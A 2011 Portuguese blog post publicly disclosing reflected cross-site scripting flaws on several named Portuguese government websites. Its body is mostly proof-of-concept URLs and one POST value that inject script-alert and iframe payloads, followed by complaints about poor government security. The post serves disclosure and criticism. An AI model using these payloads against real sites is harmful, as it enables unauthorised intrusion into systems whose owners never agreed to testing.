XSS nos sites governamentais

 

Parece que a (in)segurança nos sites do governo português continua.

Vou deixar alguns exemplos:

http://www.ire.gov.pt/irenews/index.php?id=7%22%3E%3Cscript%3Ealert(/seczero/)%3C/script%3E

http://dgarq.gov.pt/?s=%3E%22%3E%3Ciframe%20src=%22https://seczero.wordpress.com%22%3E

http://antt.dgarq.gov.pt/?s=%3E%22%3E%3Ciframe+src%3D%22http%3A%2F%2Fseczero.wordpress.com%22%3E

http://www.e-financas.gov.pt/de/jsp-dgaiec/main.jsp?body=/home/pesquisa.jsp

POST: query=”><script>alert(“seczero”)</script>

Quando é que vão começar a dar valor à segurança informática? Quando é que vão começar a contratar profissionais de qualidade?

Anúncios

~ por bsdworks em Janeiro 31, 2011.

Uma resposta to “XSS nos sites governamentais”

  1. Excelente post! Sem dúvida que em Portugal os profissionais de segurança ainda não abundam.

    Parabéns pelo blog.

Deixe uma Resposta

Preencha os seus detalhes abaixo ou clique num ícone para iniciar sessão:

Logótipo da WordPress.com

Está a comentar usando a sua conta WordPress.com Terminar Sessão / Alterar )

Imagem do Twitter

Está a comentar usando a sua conta Twitter Terminar Sessão / Alterar )

Facebook photo

Está a comentar usando a sua conta Facebook Terminar Sessão / Alterar )

Google+ photo

Está a comentar usando a sua conta Google+ Terminar Sessão / Alterar )

Connecting to %s

 
%d bloggers like this: